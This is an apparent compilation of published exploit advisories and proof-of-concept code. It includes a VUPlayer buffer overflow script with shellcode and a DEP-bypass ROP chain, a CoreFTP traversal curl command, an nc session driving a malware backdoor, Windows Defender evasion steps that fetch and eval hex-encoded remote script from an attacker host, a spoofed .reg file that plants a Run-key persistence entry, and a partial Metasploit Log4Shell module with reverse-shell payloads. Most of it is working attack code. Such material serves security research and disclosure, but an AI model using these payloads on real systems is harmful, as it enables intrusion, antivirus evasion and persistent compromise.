<pre><code># Exploit Title: VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)<br /># Date: 26/06/2021<br /># Exploit Author: Bryan Leong <NobodyAtall><br /># Vendor Homepage: http://www.vuplayer.com/<br /># Software Link: [Null]<br /># Version: VUPlayer 2.49<br /># Tested on: Windows 7 x64<br /># CVE : CVE-2009-0182<br /><br /># VUPlayer 2.49 Local Buffer Overflow to Arbitrary Code Execution (Importing .wax playlist file) (Bypass DEP protection)<br /><br />import struct<br /><br /><br />#shellcode<br />#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a" -f python<br />buf = b""<br />buf += b"\xd9\xea\xba\x33\x44\x3b\x11\xd9\x74\x24\xf4\x5d\x33"<br />buf += b"\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\x27\xa6"<br />buf += b"\xce\xed\xaf\xa4\x31\x0e\x2f\xc9\xb8\xeb\x1e\xc9\xdf"<br />buf += b"\x78\x30\xf9\x94\x2d\xbc\x72\xf8\xc5\x37\xf6\xd5\xea"<br />buf += b"\xf0\xbd\x03\xc4\x01\xed\x70\x47\x81\xec\xa4\xa7\xb8"<br />buf += b"\x3e\xb9\xa6\xfd\x23\x30\xfa\x56\x2f\xe7\xeb\xd3\x65"<br />buf += b"\x34\x87\xaf\x68\x3c\x74\x67\x8a\x6d\x2b\xfc\xd5\xad"<br />buf += b"\xcd\xd1\x6d\xe4\xd5\x36\x4b\xbe\x6e\x8c\x27\x41\xa7"<br />buf += b"\xdd\xc8\xee\x86\xd2\x3a\xee\xcf\xd4\xa4\x85\x39\x27"<br />buf += b"\x58\x9e\xfd\x5a\x86\x2b\xe6\xfc\x4d\x8b\xc2\xfd\x82"<br />buf += b"\x4a\x80\xf1\x6f\x18\xce\x15\x71\xcd\x64\x21\xfa\xf0"<br />buf += b"\xaa\xa0\xb8\xd6\x6e\xe9\x1b\x76\x36\x57\xcd\x87\x28"<br />buf += b"\x38\xb2\x2d\x22\xd4\xa7\x5f\x69\xb2\x36\xed\x17\xf0"<br />buf += b"\x39\xed\x17\xa4\x51\xdc\x9c\x2b\x25\xe1\x76\x08\xd9"<br />buf += b"\xab\xdb\x38\x72\x72\x8e\x79\x1f\x85\x64\xbd\x26\x06"<br />buf += b"\x8d\x3d\xdd\x16\xe4\x38\x99\x90\x14\x30\xb2\x74\x1b"<br />buf += b"\xe7\xb3\x5c\x78\x66\x20\x3c\x51\x0d\xc0\xa7\xad"<br /> <br />junk = "A"*1012<br /><br />#no ASLR modules<br />#BASS.dll <br />#BASSMIDI.dll<br />#BASSWMA.dll<br /><br />#check bad chars<br />#badchar = \x00, \x0a, \x1a<br /><br />#ROP Chains<br />#!mona rop -m BASS.dll,BASSMIDI.dll -n -cpb '\x00\x0A\x1A'<br />def create_rop_chain():<br /><br /> rop_gadgets = [<br /> 0x10015f77, # POP EAX # RETN [BASS.dll] <br /> 0x1060e25c, # ptr to &VirtualProtect() [IAT BASSMIDI.dll]<br /> 0x1001eaf1, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BASS.dll] <br /> 0x10030950, # XCHG EAX,ESI # RETN [BASS.dll] <br /> 0x1001d748, # POP EBP # RETN [BASS.dll] <br /> 0x100222c5, # & jmp esp [BASS.dll]<br /> 0x10015fe7, # POP EAX # RETN [BASS.dll] <br /> 0xfffffdff, # Value to negate, will become 0x00000201<br /> 0x10014db4, # NEG EAX # RETN [BASS.dll] <br /> 0x10032f32, # XCHG EAX,EBX # RETN 0x00 [BASS.dll] <br /> 0x10015f77, # POP EAX # RETN [BASS.dll] <br /> 0xffffffc0, # Value to negate, will become 0x00000040<br /> 0x10014db4, # NEG EAX # RETN [BASS.dll] <br /> 0x10038a6d, # XCHG EAX,EDX # RETN [BASS.dll] <br /> 0x100163c7, # POP ECX # RETN [BASS.dll] <br /> 0x1060da06, # &Writable location [BASSMIDI.dll]<br /> 0x10603658, # POP EDI # RETN [BASSMIDI.dll] <br /> 0x1001dc05, # RETN (ROP NOP) [BASS.dll]<br /> 0x10015fe7, # POP EAX # RETN [BASS.dll] <br /> 0x90909090, # nop<br /> 0x1001d7a5, # PUSHAD # RETN [BASS.dll] <br /> ]<br /> return ''.join(struct.pack('<I', _) for _ in rop_gadgets)<br /><br />rop_chain = create_rop_chain()<br /><br />#give some space between shellcode & ropchain<br />nop = "\x90"*16<br /><br />payload = junk + rop_chain + nop + buf<br /><br />f = open("poc.wax", "w")<br />f.write(payload)<br />f.close()<br /> <br /></code></pre>
<pre><code># Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)<br /># Date: 08/01/2022<br /># Exploit Author: LiamInfosec<br /># Vendor Homepage: http://coreftp.com/<br /># Version: build 725 and below<br /># Tested on: Windows 10<br /># CVE : CVE-2022-22836<br /><br /># Description:<br /><br />CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.<br /><br /># Proof of Concept:<br /><br />curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/859aab793a42868343346163bd42f485.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Controlit.10<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 3347. Third-party attackers who can reach an infected system can run any OS commands made available by the malware further compromising the host.<br />Type: PE32<br />MD5: 859aab793a42868343346163bd42f485<br />Vuln ID: MVID-2022-0449<br />Disclosure: 01/10/2022 <br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 3347<br />Welcome to Control-it! Server.<br />Ready<br />HELP<br />Commands:<br />EXIT VERS LIST EXEC DELE RENM MKDR RMDR CHDR<br />WKDR UPLD DNLD SHDN REBT RELG HELP<br />Ready<br />EXEC net user HYP3RLINX 666 /add<br />Ready<br />EXEC calc<br />Ready<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>[+] Credits: John Page (aka hyp3rlinx) <br />[+] Website: hyp3rlinx.altervista.org<br />[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt<br />[+] twitter.com/hyp3rlinx<br />[+] ISR: ApparitionSec <br /> <br /><br />[Vendor]<br />www.microsoft.com<br /><br /><br />[Product]<br />Windows Defender<br /><br />Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for Endpoint. This protection brings together<br />machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to protect devices (or endpoints) in<br />your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to provide protection on your<br />device and in the cloud.<br /><br /><br />[Vulnerability Type]<br />Windows Defender Detection Bypass<br />TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A<br /><br /><br />[CVE Reference]<br />N/A<br /><br /><br />[Security Issue]<br />Currently, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail<br />and attackers will get an "Access is denied" error message. However, it can be easily bypassed by passing an extra path traversal when referencing mshtml.<br /><br />C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)<br />Access is denied.<br /><br />Pass an extra "..\" to the path.<br />C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)<br /><br />Windows Defender also detects based on the following javascript call using GetObject("script:http://ATTACKER_IP/hi.tmp").<br />However, that interference can be bypassed by using concatenation when constructing the URL scheme portion of the payload.<br /><br />C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")<br />Access is denied.<br /><br />Full bypass E.g.<br /><br />C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")<br /><br />Enter, Backdoor:JS/Relvelshe.A detection.<br /><br />Windows Defender also prevents downloaded code execution, detected as "Backdoor:JS/Relvelshe.A" and is removed by Windows Defender once it hits InetCache.<br />"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"<br /><br />However, this is easily bypassed by Hex encoding our payload code new ActiveXObject("WScript.Shell").Run("calc.exe").<br />Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function. <br /><br /><br />[References]<br />Trojan:Win32/Powessere.G<br />https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427<br /><br />Backdoor:JS/Relvelshe.A<br />https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426<br /><br />Advisory:<br />https://twitter.com/hyp3rlinx/status/1480651583172091904<br /><br /><br />[Exploit/PoC]<br />1) Remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A detection.<br /><br />python -m http.server 80<br /><br />"hi.tmp"<br /><br /><?xml version="1.0"?><br /><component><br /><script><br /><![CDATA[<br />var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";<br />var str = '';<br />for (var n = 0; n < hex.length; n += 2) {<br />str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));<br />}<br />eval(str)<br />]]><br /></script><br /></component><br /><br /><br />2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")<br /><br /><br />BOOM!<br /><br /><br />[Network Access]<br />Local<br /><br /><br />[Severity]<br />High<br /><br /><br />[Disclosure Timeline]<br />January 10, 2022 : Public Disclosure<br /><br /><br />[+] Disclaimer<br />The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and<br />that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit<br />is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />hyp3rlinx<br /></code></pre>
<pre><code>[+] Credits: John Page (aka hyp3rlinx)<br />[+] Website: hyp3rlinx.altervista.org<br />[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_REG_FILE_DIALOG_SPOOF_MITIGATION_BYPASS.txt<br />[+] twitter.com/hyp3rlinx<br />[+] ISR: ApparitionSec<br /><br />[Vendor]<br />www.microsoft.com<br /><br />A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values.<br />.reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.<br /><br /><br />[Vulnerability Type]<br />Windows .Reg File Dialog Spoof - Mitigation Bypass<br /><br /><br />[CVE Reference]<br />N/A<br /><br />[Security Issue]<br />Back in 2019 I disclosed a novel way to spoof the Windows registry dialog warning box to display an attacker controlled message.<br />This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes to abort" or<br />whatever else an attacker would like to display.<br /><br />This flaw can potentially make users think they are canceling the registry import when they are in fact importing it, as we can make the<br />registry security warning dialog box LIE to them as the warning messages are now under an attacker's control.<br /><br />The way it works is using a specially crafted .Reg filename, this allows control of the registry warning dialog message presented to an end user.<br /><br />Recently, I noticed in 2022 .Reg file dialog spoof no longer works on Windows 10, but instead triggers an access violation in Regedit.exe.<br />Therefore, something has changed in the OS, possibly a silent mitigation hmmm. Wouldn't be the first time, back in 2016 my msinfo32.exe<br />.NFO file XXE injection vulnerability report had a similar fate, fixed with no CVE or bulletin and that one allowed remote file access data theft.<br /><br />In an threatpost.com interview in 2019, Microsoft stated "The issue submitted does not meet the severity bar for servicing via a security update"<br />Reference: https://threatpost.com/windows-bug-spoof-dialog-boxes/142711<br /><br />However, the "fix" is easily bypassed and the old payload can still be made to work across systems.<br /><br />Bypassing .Reg spoofing fix was only the start, I had to find ways to bypass two different Windows Defender detections along the way for the PoC.<br /><br />Trojan:Win32/Powessere.G<br />https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427<br /><br />Backdoor:JS/Relvelshe.A<br />https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426<br /><br />Lets begin...<br /><br />My original .Reg file spoofing payload of 2019, now triggers an access violation and crashes regedit.exe from invalid pointer read.<br /><br />00007FFE7A4A7C83 | EB 0D | jmp ntdll.7FFE7A4A7C92 |<br />00007FFE7A4A7C85 | FF C9 | dec ecx | ;This loops thru to read in the path + filename<br />00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ;ACCESS VIOLATION HERE<br />00007FFE7A4A7C8C | 74 08 | je ntdll.7FFE7A4A7C96 | ;Move the string down two bytes<br />00007FFE7A4A7C8E | 49 83 C5 02 | add r13,2 | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"<br />00007FFE7A4A7C92 | 85 C9 | test ecx,ecx <br /><br />00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ; BOOM ACCESS VIOLATION on Win10, but not Win7<br /><br />ntdll!woutput_l+0x387:<br />00007ffe`7a4a7c87 6645395d00 cmp word ptr [r13],r11w ds:000001ed`00000000=????<br />========================================================================================================================================<br /><br />Online search shows Win-7 still makes up about 22% of the world's computers, so I ask my friend Security researcher Eduardo Braun Prado (Edu_Braun_0day)<br />to help me re-test the .REG file spoof on Windows 7 for completeness. Turns out my original payload still works on Win-7 and with minor tweaks on Win-10.<br /><br />Original works on Win-7, but crashes regedit.exe on Win-10:<br />Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg<br /><br />Original payload (first mitigation bypass) works Win-7/Win-10:<br />Remove second to last byte (%1) before the %0 string terminator and %b characters Windows_Reg_Spoof_Mitigation_Bypass.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg<br /><br />New payload mitigation bypass works on both Win-7 and Win-10:<br />Windows_Reg_Spoof_Mitigation_Bypass.%n%nClick YES to cancel%0.reg<br /><br />However, we are NOT done yet as we must deal with Windows Defender detection preventions.<br /><br />1) Trojan:Win32/Powessere.G<br />2) Backdoor:JS/Relvelshe.A<br /><br />Bypassing "Trojan:Win32/Powessere.G"<br />=====================================<br />Two components required to defeat Trojan:Win32/Powessere.G detection in Windows Defender.<br /><br />A) extra path traversal when referencing mshtml ..\\..\\..\\<br />B) concatenation when constructing the remote server URL scheme "script"+":"+"http.<br /><br />FAIL on current updated Windows 10<br />C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)<br />Access is denied.<br /><br />SUCCESSFUL on current updated Windows 10<br />Using an extra ..\ results in a bypass, but does nothing useful just an alert box.<br />C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(1)<br /><br />Trying to download and execute remote code using the payload below fails again, as we need the second component URL scheme concat.<br />C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.1.45/hi.tmp")<br />Access is denied.<br /><br />Jscript concatenation of the URL scheme.<br />document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")<br /><br />Successfully bypasses "Trojan:Win32/Powessere.G" detection!<br />C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")<br /><br />Final hurdle we face, Windows defender detects the below downloaded file named "backdoor" as Backdoor:JS/Relvelshe.A and removes it from INetCache.<br />"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\backdoor[1]"<br /><br />File "backdoor" contents.<br /><br /><?xml version="1.0"?><br /><package><br /><component id="testCalc"><br /><script language="JScript"><br /><![CDATA[<br />new ActiveXObject("WScript.Shell").Run("calc.exe"); <br />]]><br /></script><br /></component><br /></package><br /><br />Bypassing "Backdoor:JS/Relvelshe.A" detection.<br />==============================================<br />The way we do this is to Hex encode our PoC code new ActiveXObject("WScript.Shell").Run("calc.exe")<br />Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function. <br /><br />var hex="6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";<br />var str='';<br />for (var n = 0; n < hex.length; n += 2) {<br />str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));<br />}<br />eval(str)<br /><br /><br />Done!, successfully bypassed the .Reg spoof mitigation and two Windows Defender detections. Long Live Windows .Reg file dialog spoofing Flaw!<br /><br /><br />[References]<br />Original advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt<br />https://threatpost.com/windows-bug-spoof-dialog-boxes/142711/<br /><br /><br />[Mitigation Bypass, New PoC Video URL]<br />https://www.youtube.com/watch?v=QANX45jieoo<br /><br /><br />[Exploit/PoC/2022]<br />Note: The circa 2019 advisory exploit abused "Image File Execution Options" to store the payload as a debugger setting for MSIE.<br />Unfortunately, that no longer works, so we will make do for now with storing the payload on disk in a .cmd file and registry Run key.<br /><br />1) Create a .Reg Dialog Spoofing file named, Sales_Report_2022.%n%nClick YES to cancel%0.reg with below contents<br />OR use the original payload with minor alterations. Sales_Report_2022.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg<br />I prefer the original because the % characters help obscure the obvious wording in the filename.<br /><br />Windows Registry Editor Version 5.00<br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] <br />"HATE"="C:\\dump\\s.cmd"<br /><br /><br />2) Create a Windows .cmd file, "s.cmd", with below contents. Unfortunately, it needs to be stored on disk using the path as referenced in the .Reg file above,<br />update server IP as required.<br /><br />rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")<br /><br /><br />3) Create the remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell.<br /><br /><?xml version="1.0"?><br /><component><br /><script><br /><![CDATA[<br />var hex= "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";<br />var str = '';<br />for (var n = 0; n < hex.length; n += 2) {<br />str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));<br />}<br /> eval(str)<br />]]><br /></script><br /></component><br /><br /><br />4) Logout and log back into Windows, BOOM calc.exe runs!<br /><br /><br />[Network Access]<br />Local<br /><br /><br />[Severity]<br />High<br /><br /><br />[Disclosure Timeline]<br />Original Vendor Notification: March 1, 2019<br />Original MSRC Response: " A registry file was created with the title you suggested, but the error message was clear."<br />Then vendor sent me a link pointing me to the "Definition of a Security Vulnerability".<br />March 10, 2019 : Public Disclosure<br /><br />Vendor Notification: <br />January 10, 2022 : Public Disclosure<br /><br /><br />[+] Disclaimer<br />The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and<br />that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit<br />is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />hyp3rlinx<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::JavaDeserialization<br /> include Msf::Exploit::Java<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::LDAP::Server<br /> include Msf::Exploit::Remote::CheckModule<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(_info = {})<br /> super(<br /> 'Name' => 'Log4Shell HTTP Header Injection',<br /> 'Description' => %q{<br /> Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,<br /> log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.<br /><br /> This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that<br /> will trigger an LDAP connection to Metasploit and load a payload.<br /><br /> The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP<br /> server in addition to the LDAP server that the target can connect to. The targeted application must have the<br /> trusted code base option enabled for this technique to work.<br /><br /> The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to<br /> run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target<br /> application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.<br /> },<br /> 'Author' => [<br /> 'Michael Schierl', # Technical guidance, examples, and patience - all of the Jedi stuff<br /> 'juan vazquez', # 2011-3544 building blocks reused in this module<br /> 'sinn3r', # 2011-3544 building blocks reused in this module<br /> 'Spencer McIntyre', # Kickoff on 2021-44228 work, improvements, and polish required for formal acceptance<br /> 'RageLtMan <rageltman[at]sempervictus>' # Metasploit module and infrastructure<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2021-44228' ],<br /> ],<br /> 'DisclosureDate' => '2021-12-09',<br /> 'License' => MSF_LICENSE,<br /> 'DefaultOptions' => {<br /> 'SRVPORT' => 389,<br /> 'WfsDelay' => 30,<br /> 'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'<br /> },<br /> 'Targets' => [<br /> [<br /> 'Automatic', {<br /> 'Platform' => 'java',<br /> 'Arch' => [ARCH_JAVA],<br /> 'RemoteLoad' => true,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'java/shell_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows', {<br /> 'Platform' => 'win',<br /> 'RemoteLoad' => false,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'<br /> }<br /> },<br /> ],<br /> [<br /> 'Linux', {<br /> 'Platform' => 'unix',<br /> 'RemoteLoad' => false,<br /> 'Arch' => [ARCH_CMD],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> },<br /> ]<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [IOC_IN_LOGS],<br /> 'AKA' => ['Log4Shell', 'LogJam'],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'RelatedModules' => [ 'auxiliary/scanner/http/log4shell_scanner' ]<br /> },<br /> 'Stance' => Msf::Exploit::Stance::Aggressive<br /> )<br /> register_options([<br /> OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),<br /> OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),<br /> OptString.new('HTTP_HEADER', [ false, 'The HTTP header to inject into' ]),<br /> OptEnum.new('JAVA_GADGET_CHAIN', [<br /> true, 'The ysoserial payload to use for deserialization', 'CommonsBeanutils1',<br /> Msf::Util::JavaDeserialization.ysoserial_payload_names<br /> ], conditions: %w[TARGET != Automatic]),<br /> OptPort.new('HTTP_SRVPORT', [true, 'The HTTP server port', 8080], conditions: %w[TARGET == Automatic]),<br /> OptBool.new('LDAP_AUTH_BYPASS', [true, 'Ignore LDAP client authentication', true])<br /> ])<br /> end<br /><br /> def check<br /> validate_configuration!<br /> # set these scanner options as appropriate based on the config<br /> datastore['URIS_FILE'] = nil<br /> if !datastore['HTTP_HEADER'].blank?<br /> datastore['HEADERS_FILE'] = nil<br /> end<br /><br /> @checkcode = super<br /> end<br /><br /> def jndi_string<br /> "${jndi:ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}}"<br /> end<br /><br /> def resource_url_string<br /> "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}#{resource_uri}"<br /> end<br /><br /> #<br /> # Use Ruby Java bridge to create a Java-natively-serialized object<br /> #<br /> # @return [String] Marshalled serialized byteArray of the loader class<br /> def byte_array_payload(pay_class = 'metasploit.PayloadFactory')<br /> jar = generate_payload.encoded_jar<br /> serialized_class_from_jar(jar, pay_class)<br /> end<br /><br /> #<br /> # Insert PayloadFactory in Java payload JAR<br /> #<br /> # @param jar [Rex::Zip::Jar] payload JAR to update<br /> # @return [Rex::Zip::Jar] updated payload JAR<br /> def inject_jar_payload_factory(jar = generate_payload.encoded_jar)<br /> # From exploits/multi/browser/java_rhino - should probably go to lib<br /> paths = [<br /> [ 'metasploit/PayloadFactory.class' ]<br /> ]<br /> paths.each do |path|<br /> 1.upto(path.length - 1) do |idx|<br /> full = path[0, idx].join('/') + '/'<br /> jar.add_file(full, '') unless jar.entries.map(&:name).include?(full)<br /> end<br /> File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', path), 'rb') do |fd|<br /> data = fd.read(fd.stat.size)<br /> jar.add_file(path.join('/'), data)<br /> end<br /> end<br /> jar<br /> end<br /><br /> #<br /> # Generate and serialize the payload as an LDAP search response<br /> #<br /> # @param msg_id [Integer] LDAP message identifier<br /> # @param base_dn [Sting] LDAP distinguished name<br /> #<br /> # @return [Array] packed BER sequence<br /> def serialized_payload(msg_id, base_dn, pay_class = 'metasploit.PayloadFactory')<br /> if target['RemoteLoad']<br /> attrs = [<br /> [ 'javaClassName'.to_ber, [ pay_class.to_ber].to_ber_set ].to_ber_sequence,<br /> [ 'javaFactory'.to_ber, [ pay_class.to_ber].to_ber_set ].to_ber_sequence,<br /> [ 'objectClass'.to_ber, [ 'javaNamingReference'.to_ber ].to_ber_set ].to_ber_sequence,<br /> [ 'javaCodebase'.to_ber, [ resource_url_string.to_ber ].to_ber_set ].to_ber_sequence,<br /> ]<br /> else<br /> java_payload = generate_java_deserialization_for_payload(datastore['JAVA_GADGET_CHAIN'], payload)<br /> # vprint_good("Serialized java payload: #{java_payload}")<br /> attrs = [<br /> [ 'javaClassName'.to_ber, [ rand_text_alphanumeric(8..15).to_ber ].to_ber_set ].to_ber_sequence,<br /> [ 'javaSerializedData'.to_ber, [ java_payload.to_ber ].to_ber_set ].to_ber_sequence<br /> ]<br /> end<br /> appseq = [<br /> base_dn.to_ber,<br /> attrs.to_ber_sequence<br /> ].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)<br /> [ msg_id.to_ber, appseq ].to_ber_sequence<br /> end<br /><br /> ## LDAP service callbacks<br /> #<br /> # Handle incoming requests via service mixin<br /> #<br /> def on_dispatch_request(client, data)<br /> return if data.strip.empty?<br /><br /> data.extend(Net::BER::Extensions::String)<br /> begin<br /> pdu = Net::LDAP::PDU.new(data.read_ber!(Net::LDAP::AsnSyntax))<br /> vprint_status("LDAP request data remaining: #{data}") unless data.empty?<br /> resp = case pdu.app_tag<br /> when Net::LDAP::PDU::BindRequest # bind request<br /> client.authenticated = true<br /> service.encode_ldap_response(<br /> pdu.message_id,<br /> Net::LDAP::ResultCodeSuccess,<br /> '',<br /> '',<br /> Net::LDAP::PDU::BindResult<br /> )<br /> when Net::LDAP::PDU::SearchRequest # search request<br /> if client.authenticated || datastore['LDAP_AUTH_BYPASS']<br /> client.write(serialized_payload(pdu.message_id, pdu.search_parameters[:base_object]))<br /> service.encode_ldap_response(pdu.message_id, Net::LDAP::ResultCodeSuccess, '', 'Search success', Net::LDAP::PDU::SearchResult)<br /> else<br /> service.encode_ldap_response(pdu.message_i, 50, '', 'Not authenticated', Net::LDAP::PDU::SearchResult)<br /> end<br /> else<br /> vprint_status("Client sent unexpected request #{pdu.app_tag}")<br /> client.close<br /> end<br /> resp.nil? ? client.close : on_send_response(client, resp)<br /> rescue StandardError => e<br /> print_error("Failed to handle LDAP request due to #{e}")<br /> client.close<br /> end<br /> resp<br /> end<br /><br /> ## HTTP service callbacks<br /> #<br /> # Handle HTTP requests and responses<br /> #<br /> def on_request_uri(cli, request)<br /> agent = request.headers['User-Agent']<br /> vprint_good("Payload requested by #{cli.peerhost} using #{agent}")<br /> pay = regenerate_payload(cli)<br /> jar = inject_jar_payload_factory(pay.encoded_jar)<br /> send_response(cli, 200, 'OK', jar)<br /> end<br /><br /> #<br /> # Create an HTTP response and then send it<br /> #<br /> def send_response(cli, code, message = 'OK', html = '')<br /> proto = Rex::Proto::Http::DefaultProtocol<br /> res = Rex::Proto::Http::Response.new(code, message, proto)<br /> res['Content-Type'] = 'application/java-archive'<br /> res.body = html<br /> cli.send_response(res)<br /> end<br /><br /> def exploit<br /> validate_configuration!<br /> if 